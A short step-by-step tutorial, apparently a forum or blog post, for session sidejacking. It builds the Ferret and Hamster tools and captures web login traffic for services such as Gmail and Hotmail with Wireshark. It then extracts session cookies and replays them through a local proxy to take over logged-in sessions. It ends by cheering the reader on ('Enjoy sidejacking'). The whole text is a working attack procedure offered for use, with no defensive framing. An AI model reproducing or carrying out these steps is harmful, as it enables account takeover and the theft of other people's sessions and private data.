1) Installing Ferret and Hamster

sudo su
apt-get install libpcap-dev
-----if you don't have a [pentest folder make one]
cd /
mkdir pentest
cd /pentest

wget http://www.erratasec.com/erratasec.zip
unzip erratasec.zip
mv hamster hamster2
cd hamster2/build/gcc4
make
cd /pentest/ferret/build/gcc4
make
cd /pentest
mkdir hamster
cp /pentest/ferret/bin/ferret /pentest/hamster
cp /pentest/hamster2/bin/favicon.ico /pentest/hamster
cp /pentest/hamster2/bin/hamster /pentest/hamster
cp /pentest/hamster2/bin/hamster.css /pentest/hamster
cp /pentest/hamster2/bin/hamster.js /pentest/hamster

2) Capture login credentials packets of any web login(gmail, hotmail etc) through wireshark and save the file as test.pcap under directory /pentest/hamster2/bin/

3) cd /pentest/hamster2/bin/

4) ./ferret -r test.pcap (Reads the mail id and necessary login credentials)

5) ./hamster (Starts hamster proxy server on http://127.0.0.1:1234

6) Configure your browser with proxy server as 127.0.0.1 and port as 1234

7) Type http://hamster in your browser.

8) Click on your IP at the bottom of the page that contains email id or any login name with which you logged into previous page while capturing packet earlier.

9) At the right pane, you can see several cookies, click one of them to recieve the logged in session of your earlier page. Now your session is hijacked and you can change anything inside the session.

Enjoy sidejacking with ferret and hamster!!!!!